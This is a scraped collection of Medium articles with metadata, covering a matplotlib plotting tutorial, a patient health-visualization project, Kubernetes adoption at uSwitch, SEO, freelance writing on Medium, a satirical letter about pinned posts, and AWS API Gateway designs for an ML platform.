axsetxlim010Range X axis axsetylim0110Range axis pltlegendCommand display legend Fig 8 Another way comparing would show two different plot side side fig ax pltsubplots12Create object ax0plotxylabel X squaredThe data plotted legend ax1plotxx3label X cubedThe data plotted legend ax0settitlePlot 1Plot title ax1settitlePlot 2Plot title ax0legendCommand display legend plot 1 ax1legendCommand display legend plot 2 plttightlayoutTo ensure overlap Fig 9 done first passing number plot ‘subplot’ function 12 mean 1 row plot 2 column plot effective meaning 2 plot function repeated one plot ‘tightlayout’ command ensures overlap small change command display legend plotlegend function display legend one plot display need specify plot third way comparison would use inset plot Within larger plot smaller plot fig ax pltsubplotsfigsize 124 axins axinsetaxes01060403 Left Bottom Width Height axplotxylabelX squared Main plot axinsplotx1xlabelX inverse Inset plot axsetxlabelXX axis title axsetylabelYY axis title axinssetxlabelXX axis title axinssetylabelYY axis title axsettitleMain PlotMain plot title axinssettitleInset Plot Inset plot title axlegendLegend main plot axinslegendLegend inset plot Fig 10 ‘figsize’ parameter within ‘subplots’ function allows change size figure ‘insetaxes’ function used create inset plot also specifying location size first two number specify plot location term percentage case first two number 01 06 specifies plot 10 left 60 X ax respectively last two number 04 03 specifies plot 40 30 main plot’s width height might noticed legend main plot overlapping inset plot matplotlib automatically chooses best possible location legend manually moved well using ‘loc’ parameter fig ax pltsubplotsfigsize 124 axins axinsetaxes01060403 Left Bottom Width Height axplotxylabelX squared axinsplotx1xlabelX inverse axsetxlabelXX axis title axsetylabelYY axis title axinssetxlabelXX axis title axinssetylabelYY axis title axsettitleMain Plot axinssettitleInset Plot axlegendloc 4 axinslegend Fig 11 ‘loc’ parameter take input 0 10 corresponding position within plot 0 mean Matplotlib choose best possible position default option integer corresponding location within plot passed ‘4’ ‘loc’ parameter meaning legend placed bottom right corner last customization covering changing plot background fig ax pltsubplotsfigsize 124 axins axinsetaxes01060403 Left Bottom Width Height axplotxylabelX squared axinsplotx1xlabelX inverse axsetxlabelXX axis title axsetylabelYY axis title axgridTrueShow grid axinssetxlabelXX axis title axinssetylabelYY axis title axinsgridcolorblue alpha03 linestyle linewidth2Grid modification axsettitleMain Plot axinssettitleInset Plot axlegendloc 4 axinslegend Fig 12 main plot default grid created simply calling grid function grid line modified like plot line modification seen inset plot grid line different colour style width compared one main plotTags Python Data Science Visualization Data Visualization
3,854
Blood and Barbed Wire
Initial meeting Despite the informality of working on the floor of my home office, I felt that I should kick off the meeting with some semi-professional expectation-setting; I let him know that my main goal was to put together visuals that would help him more effectively tell his story when seeing a new GI doctor. I also told him I was going to ask a lot of questions and he could opt out if he didn’t want to talk about something. (That seems important when crossing boundaries between friendship and informal counseling.) He’d shown up to my house with a 4-page, single spaced document in which he had written down the things he wanted to say — symptom descriptions, tests he’d had, diets and interventions he’d tried, family history, and more. The narrative contained a lot of useful information, but I could see that it could be difficult for a doctor to absorb in a short amount of time. Timeline sketch We started with a timeline of events. I had taped together four 11x17 pages and drawn a line to represent his whole life. Using his prepared narrative, we hunched over the timeline and noted key events; as we worked, he also remembered things that were not in his document. Some detail from the initial timeline Feeling good/bad Next I left the room and gave him some materials to put together a picture of what his body feels like when he’s feeling good and feeling bad. I’d prepared a sheet of icons that he could cut out and tape to the body shape, or he could simply draw on it. He took about 10 minutes to do this. When I came back, I was extremely impressed by what he had put together. I asked him to talk me through it, and as he did I wrote down quotes along the side of the image. Feeling bad: “Like barbed wire making its way through my intestines” Feeling good: At this point we had a timeline, drawings of what ‘feeling good’ and ‘feeling bad’ look like, and a list of questions and theories that had come up along the way. Key problem Aside from not getting any answers or solid reasoning for his symptoms, my friend’s biggest frustration was that new doctors kept wanting to have him try the same treatments, even though he was sure they were not helping. We decided to put together a matrix showing what ‘helps’ and ‘does not help’ along with any supporting evidence.
https://medium.com/pictal-health/blood-barbed-wire-cfef600bfdd4
['Katie Mccurdy']
2018-04-18 18:19:55.700000+00:00
['Health', 'Visualization', 'Data', 'Healthcare', 'UX']
Title Blood Barbed WireContent Initial meeting Despite informality working floor home office felt kick meeting semiprofessional expectationsetting let know main goal put together visuals would help effectively tell story seeing new GI doctor also told going ask lot question could opt didn’t want talk something seems important crossing boundary friendship informal counseling He’d shown house 4page single spaced document written thing wanted say — symptom description test he’d diet intervention he’d tried family history narrative contained lot useful information could see could difficult doctor absorb short amount time Timeline sketch started timeline event taped together four 11x17 page drawn line represent whole life Using prepared narrative hunched timeline noted key event worked also remembered thing document detail initial timeline Feeling goodbad Next left room gave material put together picture body feel like he’s feeling good feeling bad I’d prepared sheet icon could cut tape body shape could simply draw took 10 minute came back extremely impressed put together asked talk wrote quote along side image Feeling bad “Like barbed wire making way intestines” Feeling good point timeline drawing ‘feeling good’ ‘feeling bad’ look like list question theory come along way Key problem Aside getting answer solid reasoning symptom friend’s biggest frustration new doctor kept wanting try treatment even though sure helping decided put together matrix showing ‘helps’ ‘does help’ along supporting evidenceTags Health Visualization Data Healthcare UX
3,855
Convergence to Kubernetes
We wanted to scale our teams further but maintain the principles of what helped us move fast: autonomy, work with minimal coordination, self-service infrastructure. Kubernetes helps us achieve this in a few ways: Application-focused abstractions We operate and configure our clusters to minimise coordination Application focused abstractions At the core of Kubernetes are concepts that map closely to the language used by an application developer. For example, you manage versions of your applications as a Deployment. You can run multiple replicas behind a Service and map that to HTTP via Ingress. And, through Custom Resources, it’s possible to extend and specialise this language to your own needs. These abstractions help application teams be more productive. The ones I’ve described above are pretty much all you need to deploy and run a web application, for example. Kubernetes automates the rest. In my iceberg picture I showed earlier these core concepts sit at the waterline: connecting what an application developer is trying to achieve with the platform underneath. Our cluster operations team can make many of the lower-level, lower-value decisions (like managing metrics, logging etc.) but have a conceptual language that connects them to the application teams above. In 2010 uSwitch operated a traditional operations team that was responsible for running the monolith and in relatively recent history had an IT team that was partly responsible for managing our AWS account. I believe one of the things that constrained the success of that team was the lack of conceptual sharing. When your language only includes concepts like EC2 instances, load-balancers, subnets, it’s hard to communicate much meaning. It made it difficult/impossible to describe what an application was; sometimes that was a Debian package, maybe it was something deployed with Capistrano etc. It wasn’t possible to describe an application in language shared by teams. In the early 2000s I worked at ThoughtWorks in London. During my interviews I was recommended Eric Evans’ Domain Driven Design book. I bought a copy from Foyles on my way home, started reading it on the train and have referenced it on most projects and systems I’ve worked on ever since. One of the key concepts presented in the book is Ubiquitous Language: emphasising the careful extraction of common vocabulary to aid communication amongst people and teams. I believe that one of Kubernetes’ greatest strengths is providing a ubiquitous language that connects applications teams and infrastructure teams. And, because it’s extensible, this can grow beyond the core concepts to more domain and business specific concepts. Shared language helps us communicate more effectively when we need to but we still want to ensure teams can operate with minimal coordination. Minimise Necessary Coordination In the Accelerate book the authors highlight characteristics of loosely-coupled architecture that drives IT performance: the biggest contributor to continuous delivery in the 2017 analysis… is whether teams can: Make large-scale changes to the design of their system without the permission of somebody outside the team Make large-scale changes to the design of their system without depending on other teams to make changes in their systems or creating significant work for other teams Complete their work without communicating and coordinating with people outside their team Deploy and release their product or service on demand, regardless of other services it depends upon Do most of their testing on demand, without requiring an integrated test environment We wanted to run centralised, soft multi-tenant clusters that all teams could build upon but we wanted to retain many of the characteristics described above. It’s not possible to avoid entirely but we operate Kubernetes as follows to try and minimise it: We run multiple production clusters and teams are able to choose which clusters to run their application in. We don’t use Federation yet (we’re waiting on AWS support) but we use Envoy instead to load-balance across the different cluster Ingress load-balancers. We can automate much of this with our Continuous Delivery pipeline (we use Drone) and other AWS services. All clusters are configured with the same Namespaces. These map approximately 1:1 with teams. We use RBAC to control access to Namespaces. All access is authenticated and authorised against our corporate identity in Active Directory. Clusters are auto-scaled and we do as much as we can to optimise node start-up time. It’s still a couple of minutes but it means that, in general, no coordination is needed even when teams need to run large workloads. Applications auto-scale using application-level metrics exported from Prometheus. Application teams can export Queries per Second, Operations per Second etc. and manage the autoscaling of their application in response to that metric. And, because we use the Cluster autoscaler, nodes will be provisioned if demand exceeds our current cluster capacity. We wrote a Go command-line tool called u that standardises the way teams authenticate to Kubernetes, Vault, request temporary AWS credentials and more. Authenticating to Kubernetes using u command-line tool I’m not arguing that Kubernetes has increased our autonomy, although that may be the case, but it’s certainly helped us maintain high levels of self-service and autonomy while reducing some of the pain we felt.
https://pingles.medium.com/convergence-to-kubernetes-137ffa7ea2bc
['Paul Ingles']
2018-06-25 13:29:15.825000+00:00
['Lean', 'Agile', 'Kubernetes', 'DevOps', 'AWS']
Title Convergence KubernetesContent wanted scale team maintain principle helped u move fast autonomy work minimal coordination selfservice infrastructure Kubernetes help u achieve way Applicationfocused abstraction operate configure cluster minimise coordination Application focused abstraction core Kubernetes concept map closely language used application developer example manage version application Deployment run multiple replica behind Service map HTTP via Ingress Custom Resources it’s possible extend specialise language need abstraction help application team productive one I’ve described pretty much need deploy run web application example Kubernetes automates rest iceberg picture showed earlier core concept sit waterline connecting application developer trying achieve platform underneath cluster operation team make many lowerlevel lowervalue decision like managing metric logging etc conceptual language connects application team 2010 uSwitch operated traditional operation team responsible running monolith relatively recent history team partly responsible managing AWS account believe one thing constrained success team lack conceptual sharing language includes concept like EC2 instance loadbalancers subnets it’s hard communicate much meaning made difficultimpossible describe application sometimes Debian package maybe something deployed Capistrano etc wasn’t possible describe application language shared team early 2000s worked ThoughtWorks London interview recommended Eric Evans’ Domain Driven Design book bought copy Foyles way home started reading train referenced project system I’ve worked ever since One key concept presented book Ubiquitous Language emphasising careful extraction common vocabulary aid communication amongst people team believe one Kubernetes’ greatest strength providing ubiquitous language connects application team infrastructure team it’s extensible grow beyond core concept domain business specific concept Shared language help u communicate effectively need still want ensure team operate minimal coordination Minimise Necessary Coordination Accelerate book author highlight characteristic looselycoupled architecture drive performance biggest contributor continuous delivery 2017 analysis… whether team Make largescale change design system without permission somebody outside team Make largescale change design system without depending team make change system creating significant work team Complete work without communicating coordinating people outside team Deploy release product service demand regardless service depends upon testing demand without requiring integrated test environment wanted run centralised soft multitenant cluster team could build upon wanted retain many characteristic described It’s possible avoid entirely operate Kubernetes follows try minimise run multiple production cluster team able choose cluster run application don’t use Federation yet we’re waiting AWS support use Envoy instead loadbalance across different cluster Ingress loadbalancers automate much Continuous Delivery pipeline use Drone AWS service cluster configured Namespaces map approximately 11 team use RBAC control access Namespaces access authenticated authorised corporate identity Active Directory Clusters autoscaled much optimise node startup time It’s still couple minute mean general coordination needed even team need run large workload Applications autoscale using applicationlevel metric exported Prometheus Application team export Queries per Second Operations per Second etc manage autoscaling application response metric use Cluster autoscaler node provisioned demand exceeds current cluster capacity wrote Go commandline tool called u standardises way team authenticate Kubernetes Vault request temporary AWS credential Authenticating Kubernetes using u commandline tool I’m arguing Kubernetes increased autonomy although may case it’s certainly helped u maintain high level selfservice autonomy reducing pain feltTags Lean Agile Kubernetes DevOps AWS
3,856
How SEO Works In 2017
How SEO Works In 2017 The way SEO works has changed. Here’s what you need to know. The way SEO works has changed. Here’s what you need to know. Most purchasing decisions start with a Google search and as such, SEO should still be your #1 source of new traffic, new leads and new revenue. If it’s not, then this is what to do about it. If it is, then this is how to keep it that way. How SEO used to work When Google started it was one single internet search engine… You would log on to google.com and perform a search: And regardless of who or where you were, you would have seen the same list of businesses from all around the world. At the time, this was fine. Google was just getting started, the internet wasn’t very big and there wasn’t that many people using it. But it was growing. And it got bigger. Much bigger. In 1998, there were 2.4 million websites on the internet. Today, there are over 1.2 billion. And it’s growing by the second: As the volume of websites on the internet grows, so does the volume of people doing Google searches: With this much data to process, and this many users to serve, it no longer made sense for Google to show everyone around the world the same list of results. And that’s how we got localised search engines like: The idea being, to show all users search results that were geographically relevant to their individual location. As the growth continued, so did the localisation to the point that most people are familiar with today which is ‘city based’ search engines. Whether searching a keyword with a local intent like “mechanic” or “mechanic brisbane”, most people would expect to see business that are in their local city. This is the paradigm most businesses we speak to are familiar with and has been the primary model for decision making around SEO strategy for a long time. And for a long time, it worked well. But not anymore. Why?
https://medium.com/digitaldisambiguation/how-seo-works-in-2017-279fe1c64709
['Jason Mcmahon']
2017-12-21 01:12:48.771000+00:00
['SEO', 'Google', 'Advertising', 'Marketing', 'Digital Marketing']
Title SEO Works 2017Content SEO Works 2017 way SEO work changed Here’s need know way SEO work changed Here’s need know purchasing decision start Google search SEO still 1 source new traffic new lead new revenue it’s keep way SEO used work Google started one single internet search engine… would log googlecom perform search regardless would seen list business around world time fine Google getting started internet wasn’t big wasn’t many people using growing got bigger Much bigger 1998 24 million website internet Today 12 billion it’s growing second volume website internet grows volume people Google search much data process many user serve longer made sense Google show everyone around world list result that’s got localised search engine like idea show user search result geographically relevant individual location growth continued localisation point people familiar today ‘city based’ search engine Whether searching keyword local intent like “mechanic” “mechanic brisbane” people would expect see business local city paradigm business speak familiar primary model decision making around SEO strategy long time long time worked well anymore WhyTags SEO Google Advertising Marketing Digital Marketing
3,857
Is Medium Worth It for Freelance Writers?
Is Medium Worth It for Freelance Writers? It depends on your goals and how much you’re willing to invest in the platform Image by Jason McBride Medium is one of the most exciting platforms for writers. It’s easy to publish your work. There are no gatekeepers or technical hurdles stopping you. It is also much easier to find an audience on Medium than it is on a traditional blog. Even better, if you want, you can get paid for your work directly from the platform. You don’t have to sell a course or affiliate products — you can get paid based on the amount of time people spend reading your words. However, if you are a professional writer, you have to guard your time carefully. Is it worth it to write on Medium? The answer depends on what you want to get out of the platform. I have been a freelance writer making a full-time income online for over eight years. I joined the Medium Partner Program in 2018. The most I have ever made in a month from the Partner Program is $1,070 in August of this year. Last month I made $533, and this month I will probably make another $500. I am not a high earner here. I have also taken long breaks from the platform because of health issues and my freelance business demands. However, I keep coming back to Medium for three reasons: It’s fun to write here Every article I write becomes a tiny digital asset Writing on Medium is great for my business Why Do You Want to Write Here? If you want to write on Medium because it’s an easy way to make money, you are wasting your time. Only 6% of writers make over $100 any given month. The highest-earning writers, the ones that earn six-figures a year just from the Partner Program, have spent years writing tons of articles. They have worked their asses off to build a loyal audience, and they have written a ton. I know writers who make significant money on Medium. You could be one of them if you want to, but it takes a lot of work. Other than looking for a shortcut to fame and fortune, there are no wrong reasons for writing on Medium. It can be an excellent way to earn some extra money. It can also be an excellent way to improve your writing skills and to meet other writers and editors. Before you decide if writing on Medium is worth it for you, you need to have a plan for how you will use the platform. Ways to Use Medium to Help Your Career Except for my first month, I have always earned at least $100 on Medium. Even when I went six months without publishing anything on the platform because I was dealing with kidney cancer, my articles were still earning a little bit of money every day. You can earn some passive income from Medium if you have a large enough backlist of curated articles. The more I publish, the more I make from the Partner Program. As much as I love getting paid directly from Medium, the reason I keep coming back here is that there are other ways to make money from writing here. I have made much more money from clients that have hired me after reading one of my posts on Medium than I ever have from the Partner Program. It’s not even close. If you are a freelance writer, Medium lets you get paid to build a portfolio. Clients can see that you have the knowledge and skills to help them. Through your writing, they get to know you before they even contact you. Another way Medium helps freelancers is that it allows you to build an email list. Building an email list will help you grow your writing business because you can take your audience with you, no matter where you go. Medium could disappear tomorrow. If you have an email list, you can direct your biggest fans to your next project. Some writers on Medium have leveraged their work here to get book deals and sell articles to magazine publishers. When you consistently put good work out into the world, people eventually take notice. Medium helps you get noticed faster. No matter what kind of writer you want to be, Medium can help you take the next step in your career if you are strategic. Changes in the Platform This doesn’t mean Medium is perfect. There is always a danger to publishing on a platform you don’t control. Medium is always changing. Sometimes the changes require you to shift the way you use the platform. Currently, Medium is changing the look of the platform and tweaking how stories are found. If you are interested in succeeding here, it doesn’t do any good to complain. You always have the same choices. You can quit, you can refuse to adapt and fade into obscurity, or you can evolve with the platform. I’ve been lucky here. Every change Medium has made since I joined in 2018 has made it easier for me to make money. However, the current changes require me to adapt. I still believe that Medium is good for me financially and creatively. But, I have changed how I use the platform. Future Strategy In the past, I have used my two main publications, Escape Motivation and Weirdo Poetry, to build two very different audiences. This has always been difficult, and with the new changes, it may be impossible for me. My new strategy is to create a new account to publish poetry, humor, comics, and visual essays in Weirdo Poetry while using this account to post stories about writing, freelancing, marketing, and business. I will still publish 99% of my work in Escape Motivation. I suspect it will take a long time for my new account to ever make $100. The kind of short creative work I write there is not easy to monetize on Medium. My main goal for the other account is to build an audience and experiment with different forms. My new account is about creative expression. I want to make it profitable, but creativity is the primary goal. The focus of this account will continue to be making money by helping freelancers, solopreneurs, and small businesses. That strategy has worked well for the past two years, and I don’t see any reason to change. I am going to be publishing more regularly on both accounts. If you are interested in my new account, you can find it here: You Get Out What You Put In Is Medium worth it for freelancers? Yes! If you are willing to invest time in building a library of useful content for your audience, it is worth the effort to write here. However, you will have to decide what your strategy will be. You have a lot of different options. But, while I believe you can do anything — you can’t do everything. You will only succeed if you commit to a strategy.
https://medium.com/escape-motivation/is-medium-worth-it-for-freelance-writers-4f9de8cc7ccb
['Jason Mcbride']
2020-10-15 07:53:07.286000+00:00
['Work', 'Freelancing', 'Business', 'Creativity', 'Writing']
Title Medium Worth Freelance WritersContent Medium Worth Freelance Writers depends goal much you’re willing invest platform Image Jason McBride Medium one exciting platform writer It’s easy publish work gatekeeper technical hurdle stopping also much easier find audience Medium traditional blog Even better want get paid work directly platform don’t sell course affiliate product — get paid based amount time people spend reading word However professional writer guard time carefully worth write Medium answer depends want get platform freelance writer making fulltime income online eight year joined Medium Partner Program 2018 ever made month Partner Program 1070 August year Last month made 533 month probably make another 500 high earner also taken long break platform health issue freelance business demand However keep coming back Medium three reason It’s fun write Every article write becomes tiny digital asset Writing Medium great business Want Write want write Medium it’s easy way make money wasting time 6 writer make 100 given month highestearning writer one earn sixfigures year Partner Program spent year writing ton article worked ass build loyal audience written ton know writer make significant money Medium could one want take lot work looking shortcut fame fortune wrong reason writing Medium excellent way earn extra money also excellent way improve writing skill meet writer editor decide writing Medium worth need plan use platform Ways Use Medium Help Career Except first month always earned least 100 Medium Even went six month without publishing anything platform dealing kidney cancer article still earning little bit money every day earn passive income Medium large enough backlist curated article publish make Partner Program much love getting paid directly Medium reason keep coming back way make money writing made much money client hired reading one post Medium ever Partner Program It’s even close freelance writer Medium let get paid build portfolio Clients see knowledge skill help writing get know even contact Another way Medium help freelancer allows build email list Building email list help grow writing business take audience matter go Medium could disappear tomorrow email list direct biggest fan next project writer Medium leveraged work get book deal sell article magazine publisher consistently put good work world people eventually take notice Medium help get noticed faster matter kind writer want Medium help take next step career strategic Changes Platform doesn’t mean Medium perfect always danger publishing platform don’t control Medium always changing Sometimes change require shift way use platform Currently Medium changing look platform tweaking story found interested succeeding doesn’t good complain always choice quit refuse adapt fade obscurity evolve platform I’ve lucky Every change Medium made since joined 2018 made easier make money However current change require adapt still believe Medium good financially creatively changed use platform Future Strategy past used two main publication Escape Motivation Weirdo Poetry build two different audience always difficult new change may impossible new strategy create new account publish poetry humor comic visual essay Weirdo Poetry using account post story writing freelancing marketing business still publish 99 work Escape Motivation suspect take long time new account ever make 100 kind short creative work write easy monetize Medium main goal account build audience experiment different form new account creative expression want make profitable creativity primary goal focus account continue making money helping freelancer solopreneurs small business strategy worked well past two year don’t see reason change going publishing regularly account interested new account find Get Put Medium worth freelancer Yes willing invest time building library useful content audience worth effort write However decide strategy lot different option believe anything — can’t everything succeed commit strategyTags Work Freelancing Business Creativity Writing
3,858
An Open Letter To My Favorite Writer About Pinning Stories On Your Profile Page
A humble request from a dedicated reader I know this is going to sound weird so please don’t hold it against me but I’m having an awful time accessing your articles. Every time I show up on your page, I notice the entire first page of stories are pinned stories that you’ve been writing over the past 6 months. These are your greatest hits. The four stories on your profile page are all pinned. The next page has four more pinned stories. The third page had four more pinned stories. I only find your newest post on the fourth page. This morning, I found your new post about adopting stray cats on the fifth page. It took me 8 minutes to get to your newest story. I don’t mind doing this for you and will continue to wade through all your pinned posts but I have a humble request for you today? Can you have a few less pinned posts so we see your latest article towards the top of your profile page? Reading your stories used to take a few minutes but now it’s taking me 8 minutes to even get to your latest post. I have to stumble through all of your greatest hits before I find what I’m looking for. Only after the 8 minutes do I get to your post and spend another 7 minutes reading it. What used to take me 7 minutes takes closer to 15 these days. I’m asking for your assistance and come to you with the most simple request to put your latest story on page 2 or at least page 3 of your profile. If you can help me cut down the searching time for your newest post by half, I would be ever so grateful. An earnest plea to get some of my time back Don’t get me wrong. I have nothing against your 16 pinned posts but I just would like to get in, read and get out. Currently, it feels like I need to plan a trip to the city known as your profile page. I have no google map on how to get there and little instructions when I do there. I go around in circles searching through publication dates to find your most recent post. Posting a few less of your pinned posts upfront will help me get to what I’m looking for sooner. I’m humbly requesting that you give me a little bit more of my time back. Each 4 minutes that I can save from finding your most recent post allows me to read someone else’s post or even one of your old posts. I mean no offense or harm. I am no hater or troll. I come with genuine gratitude and an earnest plea. Thank you for understanding and I look forward to seeing your latest post soon. I hope I won’t have to spend the regular 8 minutes to find it by going through all the pinned posts. Your reader and fan, Pinned Out p.s. This is in no way a bribe but I just donated another $20 to your KoFi account. You can use it for coffee or to pay for your Medium subscription or for groceries. I ask nothing in return. You don’t have to move your latest story to the top of the profile page but if you did, I would be forever grateful and there may be more KoFi donations coming your way.
https://medium.com/the-haven/an-open-letter-to-my-favorite-writer-about-pinning-stories-on-your-profile-page-666ac9cee9d4
['Vishnu S Virtues']
2020-12-09 22:29:13.236000+00:00
['Language', 'Creativity', 'Psychology', 'Culture', 'Lifestyle']
Title Open Letter Favorite Writer Pinning Stories Profile PageContent humble request dedicated reader know going sound weird please don’t hold I’m awful time accessing article Every time show page notice entire first page story pinned story you’ve writing past 6 month greatest hit four story profile page pinned next page four pinned story third page four pinned story find newest post fourth page morning found new post adopting stray cat fifth page took 8 minute get newest story don’t mind continue wade pinned post humble request today le pinned post see latest article towards top profile page Reading story used take minute it’s taking 8 minute even get latest post stumble greatest hit find I’m looking 8 minute get post spend another 7 minute reading used take 7 minute take closer 15 day I’m asking assistance come simple request put latest story page 2 least page 3 profile help cut searching time newest post half would ever grateful earnest plea get time back Don’t get wrong nothing 16 pinned post would like get read get Currently feel like need plan trip city known profile page google map get little instruction go around circle searching publication date find recent post Posting le pinned post upfront help get I’m looking sooner I’m humbly requesting give little bit time back 4 minute save finding recent post allows read someone else’s post even one old post mean offense harm hater troll come genuine gratitude earnest plea Thank understanding look forward seeing latest post soon hope won’t spend regular 8 minute find going pinned post reader fan Pinned p way bribe donated another 20 KoFi account use coffee pay Medium subscription grocery ask nothing return don’t move latest story top profile page would forever grateful may KoFi donation coming wayTags Language Creativity Psychology Culture Lifestyle
3,859
Implementation of the API Gateway Layer for a Machine Learning Platform on AWS
After defining some of the main concepts in the API world in the previous article, I will talk about the different ways of deploying an API Gateway for the Machine Learning platform. In this article, I will use the infrastructure and software layers designed in one of my previous articles. You may want to go through it to have a clearer view of the platform’s architecture before proceeding. As a reminder, the scope of this series of articles is the model serving layer of the ML platform’s framework layer. In other words, its “API Gateway”. Scope of this series of articles, by the author Now let’s start designing! A question may arise: If we are in an AWS environment, why not just use the fully managed and serverless AWS API Gateway? You never know if you don’t try. So let’s try this! 1 | Just the AWS managed API Gateway Here’s how AWS API Gateway could be placed in front of an EKS cluster. AWS API Gateway for the API Gateway layer, by the author First of all, AWS API Gateway is a fully managed service and runs in its own VPC: so we don’t know what’s happening between the scenes or any details about the infrastructure. Thanks to AWS documentation, we know that we can use API Gateway private integrations¹ to get the traffic from the API Gateway’s VPC to our VPC using an API Gateway resource of VpcLink². The Private VpcLink is a great way to provide access to HTTP(S) resources within our VPC without exposing them directly to the public internet. But that’s not all. The VpcLink is here to direct the traffic to a Network Load Balancer (NLB). So the user is responsible for creating an NLB which serves the traffic to the EKS cluster. With the support of NLB in Kubernetes 1.9+, we can create a Kubernetes service of type LoadBalancer With an annotation indicating that It’s a Network load balancer³. That would be a correct setup for the AWS API Gateway on EKS. We could as well benefit from WAF support for the managed API Gateway. The problem with this setup is we have the power of an API Gateway, but it’s far away from our cluster and our services. If we want to use a specific deployment strategy for each service, it would be great if this is done very close to the service (like in the service’s definition itself!). 2 | API Gateway closer to our ML models! Here’s another way of doing things. Design components: AWS API Gateway + NLB + Ambassador API Gateway. AWS API Gateway Combined with Ambassador for the API Gateway layer, by the author In this setup, we put an open-source API Gateway solution closer to our services. I will talk in detail about Ambassador in a future article. For now, let’s just say it’s a powerful open-source API/Ingress Gateway for our ML platform that brings the API Gateway’s features closer to our models. So do we really need the AWS API Gateway? Not really… One downside though, we will lose the WAF advantages for sure if we don’t use the AWS API Gateway. But maybe we can optimize it more! 3 | Eliminate the AWS API Gateway! So let’s eliminate the AWS API Gateway. Design components: NLB in public subnet + Ambassador API Gateway. Public AWS NLB Combined with Ambassador for the API Gateway layer, by the author We just need to put the NLB in a public subnet so that we can receive the public traffic. However, NLB doesn’t understand HTTP/HTTP(s) traffic, it allows only TCP traffic, no HTTPS offloading, and they have none of the nice OSI’s layer 7 features of the Application Load Balancer (ALB). Plus, with an NLB, we still can’t have the advantages of WAF. 4 | Our final design! So, here’s the final setup. Design components: ALB in public subnet + WAF + NLB in private subnet + Ambassador API Gateway. Final setup for the API Gateway layer, by the author As WAF integrates well with Application Load Balancer (ALB), why not get an ALB in front of the NLB. We can get that NLB back to its private subnet as well. One thing to pay attention to though: In this setup, AWS ALB cannot be assigned a static public IP address. So, after some time, the ALB’s IP changes and we lose access to the platform. Two possible solutions: 1. Summon the almighty Amazon Route53: We need to use the DNS name of the ALB instead of its changing IP addresses. To do this: a. We have to migrate our nameservers to Route53 if it’s not already the case. b. Pay attention to mails redirection: Route53 is only a DNS resolver and does not redirect emails. A solution for this could be to use an MX record and a mail server (like Amazon WorkMail). 2. Use AWS Global Accelerator: we never get bored with Amazon. Recently, Amazon launched this new service which could easily solve such a problem. A global accelerator with 2 fixed IPs and a unique DNS name will receive the traffic and direct it to an endpoint group containing our ALB. Here’s a detailed guide on how to use this new feature. Conclusion In this article, I tried to study different deployments of an API Gateway for the Machine Learning platform. Starting from simply using an AWS API Gateway, I tried to find an optimal setup with maximum use of AWS advanced features like WAF. In the next article, I will discuss in detail Ambassador and various concepts behind its existence. If you have any questions, please reach out to me on LinkedIn. [1] https://docs.aws.amazon.com/apigateway/latest/developerguide/set-up-private-integration.html [2] https://docs.aws.amazon.com/apigateway/api-reference/resource/vpc-link/ [3] https://kubernetes.io/docs/concepts/services-networking/service/#aws-nlb-support
https://medium.com/swlh/implementation-of-the-api-gateway-layer-for-a-machine-learning-platform-on-aws-589381258391
['Salah Rekik']
2020-11-19 17:33:26.913000+00:00
['Machine Learning', 'Api Gateway', 'AWS', 'Technology', 'Cloud Computing']
Title Implementation API Gateway Layer Machine Learning Platform AWSContent defining main concept API world previous article talk different way deploying API Gateway Machine Learning platform article use infrastructure software layer designed one previous article may want go clearer view platform’s architecture proceeding reminder scope series article model serving layer ML platform’s framework layer word “API Gateway” Scope series article author let’s start designing question may arise AWS environment use fully managed serverless AWS API Gateway never know don’t try let’s try 1 AWS managed API Gateway Here’s AWS API Gateway could placed front EKS cluster AWS API Gateway API Gateway layer author First AWS API Gateway fully managed service run VPC don’t know what’s happening scene detail infrastructure Thanks AWS documentation know use API Gateway private integrations¹ get traffic API Gateway’s VPC VPC using API Gateway resource VpcLink² Private VpcLink great way provide access HTTPS resource within VPC without exposing directly public internet that’s VpcLink direct traffic Network Load Balancer NLB user responsible creating NLB serf traffic EKS cluster support NLB Kubernetes 19 create Kubernetes service type LoadBalancer annotation indicating It’s Network load balancer³ would correct setup AWS API Gateway EKS could well benefit WAF support managed API Gateway problem setup power API Gateway it’s far away cluster service want use specific deployment strategy service would great done close service like service’s definition 2 API Gateway closer ML model Here’s another way thing Design component AWS API Gateway NLB Ambassador API Gateway AWS API Gateway Combined Ambassador API Gateway layer author setup put opensource API Gateway solution closer service talk detail Ambassador future article let’s say it’s powerful opensource APIIngress Gateway ML platform brings API Gateway’s feature closer model really need AWS API Gateway really… One downside though lose WAF advantage sure don’t use AWS API Gateway maybe optimize 3 Eliminate AWS API Gateway let’s eliminate AWS API Gateway Design component NLB public subnet Ambassador API Gateway Public AWS NLB Combined Ambassador API Gateway layer author need put NLB public subnet receive public traffic However NLB doesn’t understand HTTPHTTPs traffic allows TCP traffic HTTPS offloading none nice OSI’s layer 7 feature Application Load Balancer ALB Plus NLB still can’t advantage WAF 4 final design here’s final setup Design component ALB public subnet WAF NLB private subnet Ambassador API Gateway Final setup API Gateway layer author WAF integrates well Application Load Balancer ALB get ALB front NLB get NLB back private subnet well One thing pay attention though setup AWS ALB cannot assigned static public IP address time ALB’s IP change lose access platform Two possible solution 1 Summon almighty Amazon Route53 need use DNS name ALB instead changing IP address migrate nameservers Route53 it’s already case b Pay attention mail redirection Route53 DNS resolver redirect email solution could use MX record mail server like Amazon WorkMail 2 Use AWS Global Accelerator never get bored Amazon Recently Amazon launched new service could easily solve problem global accelerator 2 fixed IPs unique DNS name receive traffic direct endpoint group containing ALB Here’s detailed guide use new feature Conclusion article tried study different deployment API Gateway Machine Learning platform Starting simply using AWS API Gateway tried find optimal setup maximum use AWS advanced feature like WAF next article discus detail Ambassador various concept behind existence question please reach LinkedIn 1 httpsdocsawsamazoncomapigatewaylatestdeveloperguidesetupprivateintegrationhtml 2 httpsdocsawsamazoncomapigatewayapireferenceresourcevpclink 3 httpskubernetesiodocsconceptsservicesnetworkingserviceawsnlbsupportTags Machine Learning Api Gateway AWS Technology Cloud Computing
3,860
A Comprehensive Guide To Publishing Poetry On Medium
